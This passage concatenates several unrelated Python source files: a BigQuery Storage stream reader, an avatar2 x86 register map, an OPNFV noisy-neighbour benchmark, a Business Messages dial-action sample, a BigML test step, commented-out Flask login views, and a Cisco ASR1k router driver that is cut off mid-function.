        self._stream_parser._parse_arrow_schema()
        return pyarrow.Table.from_batches([], schema=self._stream_parser._schema)

    def to_dataframe(self, dtypes=None):
        """Create a :class:`pandas.DataFrame` of all rows in the stream.

        This method requires the pandas libary to create a data frame and the
        fastavro library to parse row messages.

        .. warning::
            DATETIME columns are not supported. They are currently parsed as
            strings in the fastavro library.

        Args:
            dtypes ( \
                Map[str, Union[str, pandas.Series.dtype]] \
            ):
                Optional. A dictionary of column names pandas ``dtype``s. The
                provided ``dtype`` is used when constructing the series for
                the column specified. Otherwise, the default pandas behavior
                is used.

        Returns:
            pandas.DataFrame:
                A data frame of all rows in the stream.
        """
        if pandas is None:
            raise ImportError(_PANDAS_REQUIRED)

        if dtypes is None:
            dtypes = {}

        # If it's an Arrow stream, calling to_arrow, then converting to a
        # pandas dataframe is about 2x faster. This is because pandas.concat is
        # rarely no-copy, whereas pyarrow.Table.from_batches + to_pandas is
        # usually no-copy.
        try:
            record_batch = self.to_arrow()
        except NotImplementedError:
            pass
        else:
            df = record_batch.to_pandas()
            for column in dtypes:
                df[column] = pandas.Series(df[column], dtype=dtypes[column])
            return df

        frames = [page.to_dataframe(dtypes=dtypes) for page in self.pages]

        if frames:
            return pandas.concat(frames)

        # No data, construct an empty dataframe with columns matching the schema.
        # The result should be consistent with what an empty ARROW stream would produce.
        self._stream_parser._parse_avro_schema()
        schema = self._stream_parser._avro_schema_json

        column_dtypes = self._dtypes_from_avro(schema["fields"])
        column_dtypes.update(dtypes)

        df = pandas.DataFrame(columns=column_dtypes.keys())
        for column in df:
            df[column] = pandas.Series([], dtype=column_dtypes[column])

        return df

    def _dtypes_from_avro(self, avro_fields):
        """Determine Pandas dtypes for columns in Avro schema.

        Args:
            avro_fields (Iterable[Mapping[str, Any]]):
                Avro fields' metadata.

        Returns:
            colelctions.OrderedDict[str, str]:
                Column names with their corresponding Pandas dtypes.
        """
        result = collections.OrderedDict()

        type_map = {"long": "int64", "double": "float64", "boolean": "bool"}

        for field_info in avro_fields:
            # If a type is an union of multiple types, pick the first type
            # that is not "null".
            if isinstance(field_info["type"], list):
                type_info = next(item for item in field_info["type"] if item != "null")

            if isinstance(type_info, str):
                field_dtype = type_map.get(type_info, "object")
            else:
                logical_type = type_info.get("logicalType")
                if logical_type == "timestamp-micros":
                    field_dtype = "datetime64[ns, UTC]"
                else:
                    field_dtype = "object"

            result[field_info["name"]] = field_dtype

        return result


class ReadRowsPage(object):
    """An iterator of rows from a read session message.

    Args:
        stream_parser (google.cloud.bigquery_storage_v1.reader._StreamParser):
            A helper for parsing messages into rows.
        message (google.cloud.bigquery_storage_v1.types.ReadRowsResponse):
            A message of data from a read rows stream.
    """

    # This class is modeled after google.api_core.page_iterator.Page and aims
    # to provide API compatibility where possible.

    def __init__(self, stream_parser, message):
        self._stream_parser = stream_parser
        self._message = message
        self._iter_rows = None
        self._num_items = self._message.row_count
        self._remaining = self._message.row_count

    def _parse_rows(self):
        """Parse rows from the message only once."""
        if self._iter_rows is not None:
            return

        rows = self._stream_parser.to_rows(self._message)
        self._iter_rows = iter(rows)

    @property
    def num_items(self):
        """int: Total items in the page."""
        return self._num_items

    @property
    def remaining(self):
        """int: Remaining items in the page."""
        return self._remaining

    def __iter__(self):
        """A ``ReadRowsPage`` is an iterator."""
        return self

    def next(self):
        """Get the next row in the page."""
        self._parse_rows()
        if self._remaining > 0:
            self._remaining -= 1
        return next(self._iter_rows)

    # Alias needed for Python 2/3 support.
    __next__ = next

    def to_arrow(self):
        """Create an :class:`pyarrow.RecordBatch` of rows in the page.

        Returns:
            pyarrow.RecordBatch:
                Rows from the message, as an Arrow record batch.
        """
        return self._stream_parser.to_arrow(self._message)

    def to_dataframe(self, dtypes=None):
        """Create a :class:`pandas.DataFrame` of rows in the page.

        This method requires the pandas libary to create a data frame and the
        fastavro library to parse row messages.

        .. warning::
            DATETIME columns are not supported. They are currently parsed as
            strings in the fastavro library.

        Args:
            dtypes ( \
                Map[str, Union[str, pandas.Series.dtype]] \
            ):
                Optional. A dictionary of column names pandas ``dtype``s. The
                provided ``dtype`` is used when constructing the series for
                the column specified. Otherwise, the default pandas behavior
                is used.

        Returns:
            pandas.DataFrame:
                A data frame of all rows in the stream.
        """
        if pandas is None:
            raise ImportError(_PANDAS_REQUIRED)

        return self._stream_parser.to_dataframe(self._message, dtypes=dtypes)


class _StreamParser(object):
    def to_arrow(self, message):
        raise NotImplementedError("Not implemented.")

    def to_dataframe(self, message, dtypes=None):
        raise NotImplementedError("Not implemented.")

    def to_rows(self, message):
        raise NotImplementedError("Not implemented.")

    def _parse_avro_schema(self):
        raise NotImplementedError("Not implemented.")

    def _parse_arrow_schema(self):
        raise NotImplementedError("Not implemented.")

    @staticmethod
    def from_read_session(read_session):
        schema_type = read_session._pb.WhichOneof("schema")
        if schema_type == "avro_schema":
            return _AvroStreamParser(read_session)
        elif schema_type == "arrow_schema":
            return _ArrowStreamParser(read_session)
        else:
            raise TypeError(
                "Unsupported schema type in read_session: {0}".format(schema_type)
            )

    @staticmethod
    def from_read_rows_response(message):
        schema_type = message._pb.WhichOneof("schema")
        if schema_type == "avro_schema":
            return _AvroStreamParser(message)
        elif schema_type == "arrow_schema":
            return _ArrowStreamParser(message)
        else:
            raise TypeError(
                "Unsupported schema type in message: {0}".format(schema_type)
            )


class _AvroStreamParser(_StreamParser):
    """Helper to parse Avro messages into useful representations."""

    def __init__(self, message):
        """Construct an _AvroStreamParser.

        Args:
            message (Union[
                google.cloud.bigquery_storage_v1.types.ReadSession, \
                google.cloud.bigquery_storage_v1.types.ReadRowsResponse, \
            ]):
                Either the first message of data from a read rows stream or a
                read session. Both types contain a oneof "schema" field, which
                can be used to determine how to deserialize rows.
        """
        if fastavro is None:
            raise ImportError(_FASTAVRO_REQUIRED)

        self._first_message = message
        self._avro_schema_json = None
        self._fastavro_schema = None
        self._column_names = None

    def to_arrow(self, message):
        """Create an :class:`pyarrow.RecordBatch` of rows in the page.

        Args:
            message (google.cloud.bigquery_storage_v1.types.ReadRowsResponse):
                Protocol buffer from the read rows stream, to convert into an
                Arrow record batch.

        Returns:
            pyarrow.RecordBatch:
                Rows from the message, as an Arrow record batch.
        """
        raise NotImplementedError("to_arrow not implemented for Avro streams.")

    def to_dataframe(self, message, dtypes=None):
        """Create a :class:`pandas.DataFrame` of rows in the page.

        This method requires the pandas libary to create a data frame and the
        fastavro library to parse row messages.

        .. warning::
            DATETIME columns are not supported. They are currently parsed as
            strings in the fastavro library.

        Args:
            message ( \
                ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \
            ):
                A message containing Avro bytes to parse into a pandas DataFrame.
            dtypes ( \
                Map[str, Union[str, pandas.Series.dtype]] \
            ):
                Optional. A dictionary of column names pandas ``dtype``s. The
                provided ``dtype`` is used when constructing the series for
                the column specified. Otherwise, the default pandas behavior
                is used.

        Returns:
            pandas.DataFrame:
                A data frame of all rows in the stream.
        """
        self._parse_avro_schema()

        if dtypes is None:
            dtypes = {}

        columns = collections.defaultdict(list)
        for row in self.to_rows(message):
            for column in row:
                columns[column].append(row[column])
        for column in dtypes:
            columns[column] = pandas.Series(columns[column], dtype=dtypes[column])
        return pandas.DataFrame(columns, columns=self._column_names)

    def _parse_avro_schema(self):
        """Extract and parse Avro schema from a read session."""
        if self._avro_schema_json:
            return

        self._avro_schema_json = json.loads(self._first_message.avro_schema.schema)
        self._column_names = tuple(
            (field["name"] for field in self._avro_schema_json["fields"])
        )
        self._first_message = None

    def _parse_fastavro(self):
        """Convert parsed Avro schema to fastavro format."""
        self._parse_avro_schema()
        self._fastavro_schema = fastavro.parse_schema(self._avro_schema_json)

    def to_rows(self, message):
        """Parse all rows in a stream message.

        Args:
            message ( \
                ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \
            ):
                A message containing Avro bytes to parse into rows.

        Returns:
            Iterable[Mapping]:
                A sequence of rows, represented as dictionaries.
        """
        self._parse_fastavro()
        messageio = io.BytesIO(message.avro_rows.serialized_binary_rows)
        while True:
            # Loop in a while loop because schemaless_reader can only read
            # a single record.
            try:
                # TODO: Parse DATETIME into datetime.datetime (no timezone),
                #       instead of as a string.
                yield fastavro.schemaless_reader(messageio, self._fastavro_schema)
            except StopIteration:
                break  # Finished with message


class _ArrowStreamParser(_StreamParser):
    def __init__(self, message):
        """Construct an _ArrowStreamParser.

        Args:
            message (Union[
                google.cloud.bigquery_storage_v1.types.ReadSession, \
                google.cloud.bigquery_storage_v1.types.ReadRowsResponse, \
            ]):
                Either the first message of data from a read rows stream or a
                read session. Both types contain a oneof "schema" field, which
                can be used to determine how to deserialize rows.
        """
        if pyarrow is None:
            raise ImportError(_PYARROW_REQUIRED)

        self._first_message = message
        self._schema = None

    def to_arrow(self, message):
        return self._parse_arrow_message(message)

    def to_rows(self, message):
        record_batch = self._parse_arrow_message(message)

        # Iterate through each column simultaneously, and make a dict from the
        # row values
        for row in zip(*record_batch.columns):
            yield dict(zip(self._column_names, row))

    def to_dataframe(self, message, dtypes=None):
        record_batch = self._parse_arrow_message(message)

        if dtypes is None:
            dtypes = {}

        df = record_batch.to_pandas()

        for column in dtypes:
            df[column] = pandas.Series(df[column], dtype=dtypes[column])

        return df

    def _parse_arrow_message(self, message):
        self._parse_arrow_schema()

        return pyarrow.ipc.read_record_batch(
            pyarrow.py_buffer(message.arrow_record_batch.serialized_record_batch),
            self._schema,
        )

    def _parse_arrow_schema(self):
        if self._schema:
            return

        self._schema = pyarrow.ipc.read_schema(
            pyarrow.py_buffer(self._first_message.arrow_schema.serialized_schema)
        )
        self._column_names = [field.name for field in self._schema]
        self._first_message = None

from capstone import *

from .architecture import Architecture

from avatar2.installer.config import GDB_X86, OPENOCD

class X86(Architecture):

    get_gdb_executable  = Architecture.resolve(GDB_X86)
    get_oocd_executable = Architecture.resolve(OPENOCD)



    qemu_name = 'i386'
    gdb_name = 'i386'
    registers = {'eax': 0,
                 'ecx': 1,
                 'edx': 2,
                 'ebx': 3,
                 'esp': 4,
                 'ebp': 5,
                 'esi': 6,
                 'edi': 7,
                 'eip': 8,
                 'pc': 8,
                 'eflags': 9,
                 'cs': 10,
                 'ss': 11,
                 'ds': 12,
                 'es': 13,
                 'fs': 14,
                 'gs': 15, }

    special_registers = {
        #SSE
        'xmm0': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm0.v4_int32',
                },
        'xmm1': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm1.v4_int32',
                },
        'xmm2': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm2.v4_int32',
                },
        'xmm3': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm3.v4_int32',
                },
        'xmm4': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm4.v4_int32',
                },
        'xmm5': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm5.v4_int32',
                },
        'xmm6': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm6.v4_int32',
                },
        'xmm7': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm7.v4_int32',
                },
        'xmm8': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm8.v4_int32',
                },
        'xmm9': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm9.v4_int32',
                },
        'xmm10': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm10.v4_int32',
                 },
        'xmm11': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm11.v4_int32',
                 },
        'xmm12': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm12.v4_int32',
                 },
        'xmm13': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm13.v4_int32',
                 },
        'xmm14': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm14.v4_int32',
                 },
        'xmm15': {'format': '{{{:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$xmm15.v4_int32',
                 },
        #AVX
        'ymm0': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm0.v8_int32',
                },
        'ymm1': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm1.v8_int32',
                },
        'ymm2': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm2.v8_int32',
                },
        'ymm3': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm3.v8_int32',
                },
        'ymm4': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm4.v8_int32',
                },
        'ymm5': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm5.v8_int32',
                },
        'ymm6': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm6.v8_int32',
                },
        'ymm7': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm7.v8_int32',
                },
        'ymm8': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm8.v8_int32',
                },
        'ymm9': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm9.v8_int32',
                },
        'ymm10': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm10.v8_int32',
                },
        'ymm11': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm11.v8_int32',
                },
        'ymm12': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm12.v8_int32',
                },
        'ymm13': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm13.v8_int32',
                },
        'ymm14': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm14.v8_int32',
                },
        'ymm15': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
                 'gdb_expression': '$ymm15.v8_int32',
                },

    }

    sr_name = 'eflags'
    unemulated_instructions = []
    capstone_arch = CS_ARCH_X86
    capstone_mode = CS_MODE_32
    word_size = 32


class X86_64(X86):
    qemu_name = 'x86_64'
    gdb_name = 'i386:x86-64'
    registers = {'rax': 0,
                 'rbx': 1,
                 'rcx': 2,
                 'rdx': 3,
                 'rsi': 4,
                 'rdi': 5,
                 'rbp': 6,
                 'rsp': 7,
                 'r8': 8,
                 'r9': 9,
                 'r10': 10,
                 'r11': 11,
                 'r12': 12,
                 'r13': 13,
                 'r14': 14,
                 'r15': 15,
                 'rip': 16,
                 'pc': 16,
                 'eflags': 17,
                 'cs': 18,
                 'ss': 19,
                 'ds': 20,
                 'es': 21,
                 'fs': 22,
                 'gs': 23,
                 }
    capstone_mode = CS_MODE_64
    unemulated_instructions = []
    capstone_mode = CS_MODE_64
    word_size = 64

# Copyright (c) 2015 Intel Research and Development Ireland Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


import instantiation_validation_benchmark as base
from experimental_framework import common


NUM_OF_NEIGHBORS = 'num_of_neighbours'
AMOUNT_OF_RAM = 'amount_of_ram'
NUMBER_OF_CORES = 'number_of_cores'
NETWORK_NAME = 'network'
SUBNET_NAME = 'subnet'


class InstantiationValidationNoisyNeighborsBenchmark(
        base.InstantiationValidationBenchmark):

    def __init__(self, name, params):
        base.InstantiationValidationBenchmark.__init__(self, name, params)

        if common.RELEASE == 'liberty':
            temp_name = 'stress_workload_liberty.yaml'
        else:
            temp_name = 'stress_workload.yaml'

        self.template_file = common.get_template_dir() + \
            temp_name
        self.stack_name = 'neighbour'
        self.neighbor_stack_names = list()

    def get_features(self):
        features = super(InstantiationValidationNoisyNeighborsBenchmark,
                         self).get_features()
        features['description'] = 'Instantiation Validation Benchmark ' \
                                  'with noisy neghbors'
        features['parameters'].append(NUM_OF_NEIGHBORS)
        features['parameters'].append(AMOUNT_OF_RAM)
        features['parameters'].append(NUMBER_OF_CORES)
        features['parameters'].append(NETWORK_NAME)
        features['parameters'].append(SUBNET_NAME)
        features['allowed_values'][NUM_OF_NEIGHBORS] = \
            ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10']
        features['allowed_values'][NUMBER_OF_CORES] = \
            ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10']
        features['allowed_values'][AMOUNT_OF_RAM] = \
            ['256M', '1G', '2G', '3G', '4G', '5G', '6G', '7G', '8G', '9G',
             '10G']
        features['default_values'][NUM_OF_NEIGHBORS] = '1'
        features['default_values'][NUMBER_OF_CORES] = '1'
        features['default_values'][AMOUNT_OF_RAM] = '256M'
        features['default_values'][NETWORK_NAME] = ''
        features['default_values'][SUBNET_NAME] = ''
        return features

    def init(self):
        super(InstantiationValidationNoisyNeighborsBenchmark, self).init()
        common.replace_in_file(self.lua_file, 'local out_file = ""',
                               'local out_file = "' +
                               self.results_file + '"')
        heat_param = dict()
        heat_param['network'] = self.params[NETWORK_NAME]
        heat_param['subnet'] = self.params[SUBNET_NAME]
        heat_param['cores'] = self.params['number_of_cores']
        heat_param['memory'] = self.params['amount_of_ram']
        for i in range(0, int(self.params['num_of_neighbours'])):
            stack_name = self.stack_name + str(i)
            common.DEPLOYMENT_UNIT.deploy_heat_template(self.template_file,
                                                        stack_name,
                                                        heat_param)
            self.neighbor_stack_names.append(stack_name)

    def finalize(self):
        common.replace_in_file(self.lua_file, 'local out_file = "' +
                               self.results_file + '"',
                               'local out_file = ""')
        # destroy neighbor stacks
        for stack_name in self.neighbor_stack_names:
            common.DEPLOYMENT_UNIT.destroy_heat_template(stack_name)
        self.neighbor_stack_names = list()

## Copyright 2022 Google LLC
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
##     https://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.

"""Sends a text mesage to the user with a suggestion action to dial a phone number.

Read more: https://developers.google.com/business-communications/business-messages/guides/how-to/message/send?hl=en#dial_action

This code is based on the https://github.com/google-business-communications/python-businessmessages
Python Business Messages client library.
"""

import uuid

from businessmessages import businessmessages_v1_client as bm_client
from businessmessages.businessmessages_v1_messages import BusinessmessagesConversationsMessagesCreateRequest
from businessmessages.businessmessages_v1_messages import BusinessMessagesDialAction
from businessmessages.businessmessages_v1_messages import BusinessMessagesMessage
from businessmessages.businessmessages_v1_messages import BusinessMessagesRepresentative
from businessmessages.businessmessages_v1_messages import BusinessMessagesSuggestedAction
from businessmessages.businessmessages_v1_messages import BusinessMessagesSuggestion
from oauth2client.service_account import ServiceAccountCredentials

# Edit the values below:
path_to_service_account_key = './service_account_key.json'
conversation_id = 'EDIT_HERE'

credentials = ServiceAccountCredentials.from_json_keyfile_name(
    path_to_service_account_key,
    scopes=['https://www.googleapis.com/auth/businessmessages'])

client = bm_client.BusinessmessagesV1(credentials=credentials)

representative_type_as_string = 'BOT'
if representative_type_as_string == 'BOT':
  representative_type = BusinessMessagesRepresentative.RepresentativeTypeValueValuesEnum.BOT
else:
  representative_type = BusinessMessagesRepresentative.RepresentativeTypeValueValuesEnum.HUMAN

# Create a text message with a dial action and fallback text
message = BusinessMessagesMessage(
    messageId=str(uuid.uuid4().int),
    representative=BusinessMessagesRepresentative(
        representativeType=representative_type
    ),
    text='Contact support for help with this issue.',
    fallback='Give us a call at +12223334444.',
    suggestions=[
        BusinessMessagesSuggestion(
            action=BusinessMessagesSuggestedAction(
                text='Call support',
                postbackData='call-support',
                dialAction=BusinessMessagesDialAction(
                    phoneNumber='+12223334444'))
            ),
        ])

# Create the message request
create_request = BusinessmessagesConversationsMessagesCreateRequest(
    businessMessagesMessage=message,
    parent='conversations/' + conversation_id)

# Send the message
bm_client.BusinessmessagesV1.ConversationsMessagesService(
    client=client).Create(request=create_request)

# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright 2014 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from world import world
from bigml.api import HTTP_OK

def i_get_the_project(step, resource):
    resource = world.api.get_project(resource)
    world.status = resource['code']
    assert world.status == HTTP_OK
    world.project = resource['object']

# automate/server/user/views.py


#################
#### imports ####
#################

#from flask import render_template, Blueprint, url_for, \
#    redirect, flash, request
#from flask_login import login_user, logout_user, login_required

#from automate.server import bcrypt, db
#from automate.server import db
#from automate.server.models import User
#from automate.server.user.forms import LoginForm, RegisterForm

################
#### config ####
################

#user_blueprint = Blueprint('user', __name__,)


################
#### routes ####
################

#@user_blueprint.route('/register', methods=['GET', 'POST'])
#def register():
#    form = RegisterForm(request.form)
#    if form.validate_on_submit():
#        user = User(
#            email=form.email.data,
#            password=form.password.data
#        )
#        db.session.add(user)
#        db.session.commit()
#
#        login_user(user)
#
#        flash('Thank you for registering.', 'success')
#        return redirect(url_for("user.members"))
#
#    return render_template('user/register.html', form=form)
#
#
#@user_blueprint.route('/login', methods=['GET', 'POST'])
#def login():
#    form = LoginForm(request.form)
#    if form.validate_on_submit():
#        user = User.query.filter_by(email=form.email.data).first()
#        if user:
#        #if user and bcrypt.check_password_hash(
#        #        user.password, request.form['password']):
#        #    login_user(user)
#            flash('You are logged in. Welcome!', 'success')
#            return redirect(url_for('user.members'))
#        else:
#            flash('Invalid email and/or password.', 'danger')
#            return render_template('user/login.html', form=form)
#    return render_template('user/login.html', title='Please Login', form=form)
#
#
#@user_blueprint.route('/logout')
#@login_required
#def logout():
#    logout_user()
#    flash('You were logged out. Bye!', 'success')
#    return redirect(url_for('main.home'))
#
#
#@user_blueprint.route('/members')
#@login_required
#def members():
#    return render_template('user/members.html')
#
# Copyright 2015 Cisco Systems, Inc.  All rights reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from sqlalchemy.orm import exc
from sqlalchemy.sql import expression as expr

from neutron.db import models_v2
from neutron.extensions import l3

from neutron_lib import constants as l3_constants
from neutron_lib import exceptions as n_exc

from networking_cisco._i18n import _, _LW
from networking_cisco import backwards_compatibility as bc
from networking_cisco.plugins.cisco.common import cisco_constants
from networking_cisco.plugins.cisco.db.l3 import ha_db
from networking_cisco.plugins.cisco.db.l3 import l3_models
from networking_cisco.plugins.cisco.db.l3.l3_router_appliance_db import (
    L3RouterApplianceDBMixin)
from networking_cisco.plugins.cisco.extensions import routerhostingdevice
from networking_cisco.plugins.cisco.extensions import routerrole
from networking_cisco.plugins.cisco.extensions import routertype
from networking_cisco.plugins.cisco.extensions import routertypeawarescheduler
from networking_cisco.plugins.cisco.l3 import drivers


LOG = logging.getLogger(__name__)


DEVICE_OWNER_GLOBAL_ROUTER_GW = cisco_constants.DEVICE_OWNER_GLOBAL_ROUTER_GW
HOSTING_DEVICE_ATTR = routerhostingdevice.HOSTING_DEVICE_ATTR
ROUTER_ROLE_GLOBAL = cisco_constants.ROUTER_ROLE_GLOBAL
ROUTER_ROLE_LOGICAL_GLOBAL = cisco_constants.ROUTER_ROLE_LOGICAL_GLOBAL
ROUTER_ROLE_HA_REDUNDANCY = cisco_constants.ROUTER_ROLE_HA_REDUNDANCY

TENANT_HSRP_GRP_RANGE = 1
TENANT_HSRP_GRP_OFFSET = 1064
EXT_HSRP_GRP_RANGE = 1
EXT_HSRP_GRP_OFFSET = 1064

N_ROUTER_PREFIX = 'nrouter-'
DEV_NAME_LEN = 14


class TopologyNotSupportedByRouterError(n_exc.Conflict):
    message = _("Requested topology cannot be supported by router.")


class ASR1kL3RouterDriver(drivers.L3RouterBaseDriver):

    def create_router_precommit(self, context, router_context):
        pass

    def create_router_postcommit(self, context, router_context):
        pass

    def update_router_precommit(self, context, router_context):
        pass

    def update_router_postcommit(self, context, router_context):
        # Whenever a gateway is added to, or removed from, a router hosted on
        # a hosting device, we must ensure that a global router is running
        # (for add operation) or not running (for remove operation) on that
        # hosting device.
        current = router_context.current
        if current[HOSTING_DEVICE_ATTR] is None:
            return
        e_context = context.elevated()
        if current['gw_port_id']:
            self._conditionally_add_global_router(e_context, current)
        else:
            self._conditionally_remove_global_router(
                e_context, router_context.original, True)

    def delete_router_precommit(self, context, router_context):
        pass

    def delete_router_postcommit(self, context, router_context):
        pass

    def schedule_router_precommit(self, context, router_context):
        pass

    def schedule_router_postcommit(self, context, router_context):
        # When the hosting device hosts a Neutron router with external
        # connectivity, a "global" router (modeled as a Neutron router) must
        # also run on the hosting device (outside of any VRF) to enable the
        # connectivity.
        current = router_context.current
        if current['gw_port_id'] and current[HOSTING_DEVICE_ATTR] is not None:
            self._conditionally_add_global_router(context.elevated(), current)

    def unschedule_router_precommit(self, context, router_context):
        pass

    def unschedule_router_postcommit(self, context, router_context):
        # When there is no longer any router with external gateway hosted on
        # a hosting device, the global router on that hosting device can also
        # be removed.
        current = router_context.current
        hd_id = current[HOSTING_DEVICE_ATTR]
        if current['gw_port_id'] and hd_id is not None:
            self._conditionally_remove_global_router(context.elevated(),
                                                     current)

    def add_router_interface_precommit(self, context, r_port_context):
        # Inside an ASR1k, VLAN sub-interfaces are used to connect to internal
        # neutron networks. Only one such sub-interface can be created for each
        # VLAN. As the VLAN sub-interface is added to the VRF representing the
        # Neutron router, we must only allow one Neutron router to attach to a
        # particular Neutron subnet/network.
        if (r_port_context.router_context.current[routerrole.ROUTER_ROLE_ATTR]
                == ROUTER_ROLE_HA_REDUNDANCY):
            # redundancy routers can be exempt as we check the user visible
            # routers and the request will be rejected there.
            return
        e_context = context.elevated()
        if r_port_context.current is None:
            sn = self._core_plugin.get_subnet(e_context,
                                              r_port_context.current_subnet_id)
            net_id = sn['network_id']
        else:
            net_id = r_port_context.current['network_id']
        filters = {'network_id': [net_id],
                   'device_owner': [bc.constants.DEVICE_OWNER_ROUTER_INTF]}
        for port in self._core_plugin.get_ports(e_context,
                                                filters=filters):
            router_id = port['device_id']
            if router_id is None:
                continue
            router = self._l3_plugin.get_router(e_context, router_id)
            if router[routerrole.ROUTER_ROLE_ATTR] is None:
                raise TopologyNotSupportedByRouterError()

    def add_router_interface_postcommit(self, context, r_port_context):
        pass

    def remove_router_interface_precommit(self, context, r_port_context):
        pass

    def remove_router_interface_postcommit(self, context, r_port_context):
        pass

    def create_floatingip_precommit(self, context, fip_context):
        pass

    def create_floatingip_postcommit(self, context, fip_context):
        pass

    def update_floatingip_precommit(self, context, fip_context):
        pass

    def update_floatingip_postcommit(self, context, fip_context):
        pass

    def delete_floatingip_precommit(self, context, fip_context):
        pass

    def delete_floatingip_postcommit(self, context, fip_context):
        pass

    def ha_interface_ip_address_needed(self, context, router, port,
                                       ha_settings_db, ha_group_uuid):
        if port['device_owner'] == bc.constants.DEVICE_OWNER_ROUTER_GW:
            return False
        else:
            return True

    def generate_ha_group_id(self, context, router, port, ha_settings_db,
                             ha_group_uuid):
        if port['device_owner'] in {bc.constants.DEVICE_OWNER_ROUTER_GW,
                                    DEVICE_OWNER_GLOBAL_ROUTER_GW}:
            ri_name = self._router_name(router['id'])[8:DEV_NAME_LEN]
            group_id = int(ri_name, 16) % TENANT_HSRP_GRP_RANGE
            group_id += TENANT_HSRP_GRP_OFFSET
            return group_id
        else:
            net_id_digits = port['network_id'][:6]
            group_id = int(net_id_digits, 16) % EXT_HSRP_GRP_RANGE
            group_id += EXT_HSRP_GRP_OFFSET
            return group_id

    def pre_backlog_processing(self, context):
        filters = {routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]}
        global_routers = self._l3_plugin.get_routers(context, filters=filters)
        if not global_routers:
            LOG.debug("There are no global routers")
            return
        for gr in global_routers:
            filters = {
